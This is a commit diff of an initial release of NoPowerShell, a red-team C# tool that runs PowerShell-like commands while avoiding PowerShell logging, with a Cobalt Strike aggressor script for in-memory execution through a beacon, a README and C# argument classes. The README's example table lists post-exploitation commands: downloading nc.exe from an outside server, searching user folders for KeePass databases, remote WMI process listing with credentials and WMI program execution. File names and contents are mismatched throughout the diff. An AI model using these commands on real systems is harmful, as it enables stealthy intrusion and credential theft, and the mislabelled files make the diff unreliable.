Initial release

Author: bitsadmin

NoPowerShell.cna

@@ -0,0 +1,24 @@
+#  _   _       ____                        ____  _          _ _
+# | \ | | ___ |  _ \ _____      _____ _ __/ ___|| |__   ___| | |
+# |  \| |/ _ \| |_) / _ \ \ /\ / / _ \ '__\___ \| '_ \ / _ \ | |
+# | |\  | (_) |  __/ (_) \ V  V /  __/ |   ___) | | | |  __/ | |
+# |_| \_|\___/|_|   \___/ \_/\_/ \___|_|  |____/|_| |_|\___|_|_|
+#
+# 							@_bitsadmin
+#		        	https://github.com/bitsadmin
+#
+
+$binary = "scripts/NoPowerShell.exe";
+$help = "Execute a command via the reflective NoPowerShell commandline";
+beacon_command_register("nps", $help, "Use: nps [command]\n\n$help");
+
+alias nps
+{
+	if(!-exists $binary)
+	{
+		berror($1, "NoPowerShell binary cannot be found at $binary");
+		return;
+	}
+	$args = replace($0, "nps ", "");
+	bexecute_assembly($1, $binary, $args);
+}

Pictures/CurrentlySupportedCommands.png

@@ -1,2 +1,89 @@
-# nopowershell
-PowerShell rebuilt in C# for Red Teaming purposes
+# NoPowerShell
+NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No `System.Management.Automation.dll` is used; only native .NET libraries.
+
+Moreover, this project makes it easy for everyone to extend its functionality using only a few lines of C# code.
+
+# Screenshots
+## Currently supported commands
+Running in Cobalt Strike.
+![NoPowerShell supported commands](https://raw.githubusercontent.com/bitsadmin/nopowershell/master/Pictures/CurrentlySupportedCommands.png "NoPowerShell in Cobalt Strike")
+## Sample commands
+![NoPowerShell sample commands](https://raw.githubusercontent.com/bitsadmin/nopowershell/master/Pictures/SampleCommands.png "NoPowerShell in Cobalt Strike")
+
+
+# Usage
+## Note
+When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe character (`|`) with respectively a caret (`^`) or a backtick (`` ` ``), i.e.:
+
+- cmd.exe: `ls ^| select Name`
+- PowerShell: ```ls `| select Name```
+
+## Examples
+| Action | Command | Notes |
+| - | - | - |
+| List help | `NoPowerShell.exe` | Alternative: `NoPowerShell.exe Get-Command` |
+| View status of a service   | `NoPowerShell.exe Get-WmiObject -Class Win32_Service -Filter "Name = 'WinRM'"` | |
+| Search for KeePass database in C:\Users folder | `NoPowerShell.exe gci C:\Users\ -Force -Recurse -Include *.kdbx \| select Directory,Name,Length` | |
+| View system information | `NoPowerShell.exe systeminfo` | |
+| List processes on the system | `NoPowerShell.exe Get-Process` | |
+| Show current user | `NoPowerShell.exe whoami` | Unofficial command |
+| List autoruns | `NoPowerShell.exe Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run` | |
+| List network shares connected to from this machine | `NoPowerShell.exe Get-NetSmbMapping` | |
+| Download file | `NoPowerShell.exe wget http://myserver.me/nc.exe` | When compiled using .NET 2 only supports SSL up to SSLv3 (no TLS 1.1+) |
+| List PowerShell processes on remote system | `NoPowerShell.exe gwmi "Select ProcessId,Name,CommandLine From Win32_Process" -ComputerName dc1.corp.local \| ? Name -Like "powershell*" \| select ProcessId,CommandLine` | Explicit credentials can be specified using the `-Username` and `-Password` parameters |
+| Execute program using WMI | `NoPowerShell.exe Invoke-WmiMethod -Class Win32_Process -Name Create "cmd /c calc.exe"` | |
+
+# Known issues
+- Pipeline characters need to surrounded by spaces
+- TLS 1.1+ is not supported by .NET Framework 2, so any site enforcing it will result in a connection error
+
+# Improvements
+- Fix above issues
+- Improve stability by adding exception handling
+- Support for parameter groups
+- Add support for ArrayArgument parameter
+- Add support for .NET code in commandline, i.e.: `[System.Security.Principal.WindowsIdentity]::GetCurrent().Name`
+
+# Contributing
+Add your own cmdlets by submitting a pull request.
+## Requirement
+- Maintain .NET 2.0 compatibility in order to support the broadest range of operating systems
+
+## Instructions
+Use the TemplateCommand.cs file in the Commands folder to construct new cmdlets. The TemplateCommand cmdlet is hidden from the list of available cmdlets, but can be called in order to understand its workings. This command looks as follows: `Get-TemplateCommand [-MyFlag] -MyInteger [Int32] -MyString [Value]` and is also accessible via alias `gtc`.
+
+### Example usages
+
+| Action | Command |
+| - | - |
+| Simply run with default values | `gtc` |
+| Run with the -MyFlag parameter which executes the 'else' statement | `gtc -MyFlag` |
+| Run with the -MyInteger parameter which changes the number of iterations from its default number of 5 iterations to whatever number is provided | `gtc -MyInteger 10` |
+| Run with the -MyString parameter which changes the text that is printed from its default value of 'Hello World' to whatever string is provided | `gtc -MyString "Bye PowerShell"` |
+| Combination of parameters | `gtc -MyInteger 10 -MyString "Bye PowerShell"` |
+| Combination of parameters - Alternative | `gtc -MyInteger 10 -MyString "Bye PowerShell"` |
+| Combination of parameters - Using fact that MyString is the only mandatory parameter for this command | `gtc -MyInteger 10 "Bye PowerShell"` |
+| Command in combination with a couple of data manipulators in the pipe | `gtc "Bye PowerShell" -MyInteger 30 \| ? Attribute2 -Like Line1* \| select Attribute2 \| fl` |
+
+Execute the following steps to implement your own cmdlet:
+1. Create a copy of the **TemplateCommand.cs** file.
+    * In case you are implementing a native PowerShell command, place it in folder the corresponding to the _Source_ attribute when executing in PowerShell: `Get-Command My-Commandlet`. Example of a native command: `Get-Command Get-Process` -> Source: `Microsoft.PowerShell.Management` -> Place the .cs file in the **Management** subfolder.
+    * In case it is a non-native command, place it in the **Additional** folder.
+2. Update the `TemplateCommand` classname and its constructor name.
+3. Update the static **Aliases** variable to the command and aliases you want to use to call this cmdlet. For native PowerShell commands you can lookup the aliases using `Get-Alias | ? ResolvedCommandName -EQ My-Commandlet` to obtain the list of aliases. Always make sure the full command is the first "alias", for example: `Get-Alias | ? ResolvedCommandName -EQ Get-Process` -> Aliases are: `Get-Process`, `gps`, `ps`
+4. Update the static **Synopsis** variable to a small text that describes the command. This will be shown in the help.
+5. Update the arguments supported by the command by adding _StringArguments_, _BoolArguments_ and _IntegerArguments_ to the static **SupportedArguments** variable.
+6. In the Execute function:
+    1. Fetch the values of the _StringArguments_, _BoolArguments_ and _IntegerArguments_ as shown in the examples;
+    2. Based on the parameters provided by the user, perform your actions;
+    3. Make sure all results are stored in the `_results` variable.
+7. Remove all of the template sample code and comments from the file to keep the source tidy.
+
+# Contributed NoPowerShell cmdlets
+Authors of additional NoPowerShell cmdlets are added to the table below. Moreover, the table lists commands that are requested by the community to add. Together we can develop a powerful NoPowerShell toolkit!
+
+| Cmdlet | Contributed by | GitHub | Twitter |
+| - | - | - | - |
+| Resolve-DnsName |  |  |  |
+| Get-ADUser |  |  |  |
+| Get-ADGroupMember |  |  |  |

Pictures/SampleCommands.png

@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.26228.4
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NoPowerShell", "NoPowerShell\NoPowerShell.csproj", "{555AD0AC-1FDB-4016-8257-170A74CB2F55}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{555AD0AC-1FDB-4016-8257-170A74CB2F55}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{555AD0AC-1FDB-4016-8257-170A74CB2F55}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{555AD0AC-1FDB-4016-8257-170A74CB2F55}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{555AD0AC-1FDB-4016-8257-170A74CB2F55}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

README.md

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+    <startup> 
+        
+    <supportedRuntime version="v2.0.50727"/></startup>
+</configuration>

Source/NoPowerShell/NoPowerShell.sln

@@ -0,0 +1,53 @@
+using System;
+
+/*
+Author: @_bitsadmin
+Website: https://github.com/bitsadmin
+License: BSD 3-Clause
+*/
+
+namespace NoPowerShell.Arguments
+{
+    /// <summary>
+    /// Base class for BoolArgument and StringArgument
+    /// </summary>
+    public class Argument : IEquatable<Argument>
+    {
+        /// <summary>
+        /// Name of the argument, for example "-Path"
+        /// </summary>
+        protected string _name;
+        protected bool _isOptionalArgument;
+        protected bool _dashArgumentNameSkipUsed;
+
+        public Argument(string name)
+        {
+            this._name = name;
+            _dashArgumentNameSkipUsed = false;
+        }
+
+        public bool Equals(Argument other)
+        {
+            return other.Name.Equals(_name.Substring(0, other.Name.Length), StringComparison.InvariantCultureIgnoreCase);
+        }
+
+        public string Name
+        {
+            get { return _name; }
+        }
+
+        public bool IsOptionalArgument
+        {
+            get { return this._isOptionalArgument; }
+        }
+
+        /// <summary>
+        /// Optional StringArgument which requires a value
+        /// </summary>
+        public bool DashArgumentNameSkipUsed
+        {
+            get { return _dashArgumentNameSkipUsed; }
+            set { _dashArgumentNameSkipUsed = value; }
+        }
+    }
+}

Source/NoPowerShell/NoPowerShell/App.config

@@ -0,0 +1,31 @@
+using System;
+using System.Collections.Generic;
+
+/*
+Author: @_bitsadmin
+Website: https://github.com/bitsadmin
+License: BSD 3-Clause
+*/
+
+namespace NoPowerShell.Arguments
+{
+    public class ArgumentList : List<Argument>
+    {
+        public T Get<T>(string argumentName) where T : Argument
+        {
+            foreach (Argument arg in this)
+            {
+                // Skip irrelevant arguments
+                if (arg.GetType() != typeof(T))
+                    continue;
+
+                // Check for matching argumentName
+                T foundArg = arg as T;
+                if (foundArg.Name.Equals(argumentName, StringComparison.InvariantCultureIgnoreCase))
+                    return foundArg;
+            }
+
+            return null;
+        }
+    }
+}

Source/NoPowerShell/NoPowerShell/Arguments/Argument.cs

@@ -0,0 +1,43 @@
+/*
+Author: @_bitsadmin
+Website: https://github.com/bitsadmin
+License: BSD 3-Clause
+*/
+
+namespace NoPowerShell.Arguments
+{
+    public class BoolArgument : Argument
+    {
+        private bool _value;
+
+        /// <summary>
+        /// Create a new boolean argument including its default value. Bool arguments are always optional.
+        /// </summary>
+        /// <param name="argumentName">Name of the parameter</param>
+        /// <param name="defaultValue">Default value of the argument</param>
+        public BoolArgument(string argumentName, bool defaultValue) : base(argumentName)
+        {
+            this._value = defaultValue;
+            this._isOptionalArgument = true;
+        }
+
+        /// <summary>
+        /// Create new boolean argument with false as its default value. Bool arguments are always optional.
+        /// </summary>
+        /// <param name="argumentName">Name of the parameter</param>
+        public BoolArgument(string argumentName) : this(argumentName, false)
+        {
+        }
+
+        public bool Value
+        {
+            get { return this._value; }
+            set { this._value = value; }
+        }
+
+        public override string ToString()
+        {
+            return string.Format("{0}: {1}", _name, _value);
+        }
+    }
+}

Source/NoPowerShell/NoPowerShell/Arguments/ArgumentList.cs

@@ -0,0 +1,61 @@
+/*
+Author: @_bitsadmin
+Website: https://github.com/bitsadmin
+License: BSD 3-Clause
+*/
+
+namespace NoPowerShell.Arguments
+{
+    public class IntegerArgument : Argument
+    {
+        private int _value;
+        private int _defaultValue;
+
+        /// <summary>
+        /// Create a new integer argument including its default value.
+        /// </summary>
+        /// <param name="argumentName">Name of the parameter</param>
+        /// <param name="defaultValue">Default value of the argument</param>
+        public IntegerArgument(string argumentName, int defaultValue) : base(argumentName)
+        {
+            this._value = defaultValue;
+            this._defaultValue = defaultValue;
+            this._isOptionalArgument = false;
+        }
+
+        /// <summary>
+        /// Create a new integer argument including its default value specifying whether it is optional or not.
+        /// </summary>
+        /// <param name="argumentName">Name of the parameter</param>
+        /// <param name="defaultValue">Default value of the argument</param>
+        /// <param name="optionalArgument">True if the argument is optional; False if not</param>
+        public IntegerArgument(string argumentName, int defaultValue, bool optionalArgument) : this(argumentName, defaultValue)
+        {
+            this._isOptionalArgument = optionalArgument;
+        }
+
+        /// <summary>
+        /// Create a new integer argument with a null default value.
+        /// </summary>
+        /// <param name="argumentName">Name of the parameter</param>
+        public IntegerArgument(string argumentName) : this(argumentName, 0)
+        {
+        }
+
+        public int Value
+        {
+            get { return _value; }
+            set { _value = value; }
+        }
+
+        public bool IsDefaultValue
+        {
+            get { return _value == _defaultValue; }
+        }
+
+        public override string ToString()
+        {
+            return string.Format("{0} \"{1}\"", _name, _value);
+        }
+    }
+}